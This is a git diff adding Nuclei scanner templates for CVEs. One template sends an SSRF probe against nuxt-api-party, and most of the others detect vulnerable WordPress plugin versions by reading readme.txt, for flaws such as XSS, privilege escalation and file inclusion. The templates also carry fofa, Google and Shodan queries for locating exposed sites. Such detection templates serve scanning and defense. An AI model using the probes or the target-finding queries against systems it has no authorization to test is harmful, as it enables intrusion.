cvss-score: 7.5 + cve-id: CVE-2023-49799 + tags: cve, cve203, ssrf, credentials, leak, web, nuxt-api-party + +variables: + payload: "https://google.com" + +requests: + - method: POST + path: + - "{{BaseURL}}/api/__api_party/MyEndpoint" + - "{{BaseURL}}/api/__api_party/__proto__" + + body: | + { + "path": " {{payload}}" + } + + headers: + Content-Type: application/json + + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "Request received" + - type: word + part: header + words: + - "Content-Type: application/json" \ No newline at end of file diff --git a/poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml b/poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml new file mode 100644 index 0000000000..dbed444716 --- /dev/null +++ b/poc/cve/CVE-2024-10000-694d94278b136ae533a9c85fde05b877.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10000-694d94278b136ae533a9c85fde05b877 + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Stored Cross-Site Scripting via Ask a Question Functionality + author: topscoder + severity: low + description: > + The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the question's content parameter in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with student-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/575f103e-cfc7-4efd-a592-658a3e919671?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10000 + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:CVE-2024-10000' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml b/poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml new file mode 100644 index 0000000000..ccf55ae909 --- /dev/null +++ b/poc/cve/CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10008-4e1fc9966938dc414b06dd519e73122b + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Missing Authorization to Privilege Escalation + author: topscoder + severity: low + description: > + The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to unauthorized user profile modification due to missing authorization checks on the /wp-json/masteriyo/v1/users/$id REST API endpoint in all versions up to, and including, 1.13.3. This makes it possible for authenticated attackers, with student-level access and above, to modify the roles of arbitrary users. As a result, attackers can escalate their privileges to the Administrator and demote existing administrators to students. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c54166e-2af2-409d-8c67-9c07f2028543?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10008 + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:CVE-2024-10008' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml b/poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml new file mode 100644 index 0000000000..78a0b94339 --- /dev/null +++ b/poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10048-b98a29a036ced771c9bb009b9895710a + +info: + name: > + Post Status Notifier Lite and Premium <= 1.11.6 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + The Post Status Notifier Lite and Premium plugins for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.11.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10048 + metadata: + fofa-query: "wp-content/plugins/post-status-notifier/" + google-query: inurl:"/wp-content/plugins/post-status-notifier/" + shodan-query: 'vuln:CVE-2024-10048' + tags: cve,wordpress,wp-plugin,post-status-notifier,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-status-notifier/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-status-notifier" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml b/poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml new file mode 100644 index 0000000000..8af931c002 --- /dev/null +++ b/poc/cve/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10181-21fdb15695068521f367ac81bba91927 + +info: + name: > + Newsletters <= 4.9.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via newsletters_video Shortcode + author: topscoder + severity: low + description: > + The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10181 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-10181' + tags: cve,wordpress,wp-plugin,newsletters-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.9.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml b/poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml new file mode 100644 index 0000000000..009dfb6c78 --- /dev/null +++ b/poc/cve/CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10184-7530619e6a2cefd5da69227ca41f6b35 + +info: + name: > + SW Kick Integration - Blocks and Shortcodes for Embedding Kick Streams <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-kick-embed Shortcode + author: topscoder + severity: low + description: > + The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-kick-embed shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/077a31e7-de4b-418f-ac90-5c51a690bc65?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10184 + metadata: + fofa-query: "wp-content/plugins/streamweasels-kick-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-kick-integration/" + shodan-query: 'vuln:CVE-2024-10184' + tags: cve,wordpress,wp-plugin,streamweasels-kick-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-kick-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-kick-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml b/poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml new file mode 100644 index 0000000000..933da1dad2 --- /dev/null +++ b/poc/cve/CVE-2024-10185-8035ec074be079e96120312271a0f33c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10185-8035ec074be079e96120312271a0f33c + +info: + name: > + StreamWeasels YouTube Integration <= 1.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-youtube-embed Shortcode + author: topscoder + severity: low + description: > + The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-youtube-embed shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10185 + metadata: + fofa-query: "wp-content/plugins/streamweasels-youtube-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-youtube-integration/" + shodan-query: 'vuln:CVE-2024-10185' + tags: cve,wordpress,wp-plugin,streamweasels-youtube-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-youtube-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-youtube-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml b/poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml new file mode 100644 index 0000000000..5f7009d3ef --- /dev/null +++ b/poc/cve/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29 + +info: + name: > + Arconix Shortcodes <= 2.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via box Shortcode + author: topscoder + severity: low + description: > + The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10226 + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:CVE-2024-10226' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.13') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml b/poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml new file mode 100644 index 0000000000..953038697d --- /dev/null +++ b/poc/cve/CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10227-cbeff506f736d2c0744bf4b540fe5582 + +info: + name: > + affiliate-toolkit <= 3.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via atkp_product Shortcode + author: topscoder + severity: low + description: > + The affiliate-toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atkp_product shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f86568f-dcdd-44fb-905a-9c5474f56515?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10227 + metadata: + fofa-query: "wp-content/plugins/affiliate-toolkit-starter/" + google-query: inurl:"/wp-content/plugins/affiliate-toolkit-starter/" + shodan-query: 'vuln:CVE-2024-10227' + tags: cve,wordpress,wp-plugin,affiliate-toolkit-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/affiliate-toolkit-starter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "affiliate-toolkit-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml b/poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml new file mode 100644 index 0000000000..55bed6d7bc --- /dev/null +++ b/poc/cve/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a + +info: + name: > + SMSAlert - WooCommerce <= 3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via sa_subscribe Shortcode + author: topscoder + severity: low + description: > + The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10233 + metadata: + fofa-query: "wp-content/plugins/sms-alert/" + google-query: inurl:"/wp-content/plugins/sms-alert/" + shodan-query: 'vuln:CVE-2024-10233' + tags: cve,wordpress,wp-plugin,sms-alert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sms-alert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sms-alert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml b/poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml new file mode 100644 index 0000000000..a49560c2e5 --- /dev/null +++ b/poc/cve/CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10266-c7464e0e6f14d3d02fbbef631b0fa0d8 + +info: + name: > + Premium Addons for Elementor <= 4.10.60 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Video Box Widget + author: topscoder + severity: low + description: > + The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Box widget in all versions up to, and including, 4.10.60 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6102c07-2776-4963-8d16-a779c5979275?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10266 + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-10266' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.60') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml b/poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml new file mode 100644 index 0000000000..4c6a6f5788 --- /dev/null +++ b/poc/cve/CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10312-50ebf94b7cedccb9e13dff934ff93b48 + +info: + name: > + Exclusive Addons for Elementor <= 2.7.4 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.4 via the render function in elements/tabs/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc931943-13f3-4ab1-b70f-c234253ca269?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10312 + metadata: + fofa-query: "wp-content/plugins/exclusive-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/exclusive-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-10312' + tags: cve,wordpress,wp-plugin,exclusive-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/exclusive-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "exclusive-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml b/poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml new file mode 100644 index 0000000000..368f26b40d --- /dev/null +++ b/poc/cve/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10360-45e78583db6193210a4d94e69731df68 + +info: + name: > + Move Addons for Elementor <= 1.3.5 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes/widgets/accordion/widget.php, includes/widgets/remote-template/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10360 + metadata: + fofa-query: "wp-content/plugins/move-addons/" + google-query: inurl:"/wp-content/plugins/move-addons/" + shodan-query: 'vuln:CVE-2024-10360' + tags: cve,wordpress,wp-plugin,move-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/move-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "move-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml b/poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml new file mode 100644 index 0000000000..dbe9c032d9 --- /dev/null +++ b/poc/cve/CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10436-a86e6c3894cf7d8dfd30fe33efb608fb + +info: + name: > + WPC Smart Messages for WooCommerce <= 4.2.1 - Authenticated (Subscriber+) Local File Inclusion + author: topscoder + severity: low + description: > + The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.1 via the get_condition_value function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fd87512-def0-4e59-aa2d-b166919474f3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10436 + metadata: + fofa-query: "wp-content/plugins/wpc-smart-messages/" + google-query: inurl:"/wp-content/plugins/wpc-smart-messages/" + shodan-query: 'vuln:CVE-2024-10436' + tags: cve,wordpress,wp-plugin,wpc-smart-messages,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-smart-messages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml b/poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml new file mode 100644 index 0000000000..2af68292b6 --- /dev/null +++ b/poc/cve/CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10437-71d2ceb29cd432d59d731bb15deb7062 + +info: + name: > + WPC Smart Messages for WooCommerce <= 4.2.1 - Missing Authorization to Authenticated (Subscriber+) Message Activation/Deactivation + author: topscoder + severity: low + description: > + The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to unauthorized Smar Message activation/deactivation due to a missing capability check on the ajax_enable function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or deactivate smart messages. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4acb4fda-0217-44b9-a85e-64807eb4a011?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10437 + metadata: + fofa-query: "wp-content/plugins/wpc-smart-messages/" + google-query: inurl:"/wp-content/plugins/wpc-smart-messages/" + shodan-query: 'vuln:CVE-2024-10437' + tags: cve,wordpress,wp-plugin,wpc-smart-messages,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpc-smart-messages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpc-smart-messages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-21520.yaml b/poc/cve/CVE-2024-21520.yaml new file mode 100644 index 0000000000..98b797ff9c --- /dev/null +++ b/poc/cve/CVE-2024-21520.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-21520 + +info: + name: Django Break Long Headers - Cross-site Scripting + author: sim4110,KoYejune0302,gy741,cheoljun99 + severity: medium + description: | + Versions of the package djangorestframework before 3.15.2 are vulnerable to Cross-site Scripting (XSS) via the break_long_headers template filter due to improper input sanitization before splitting and joining with
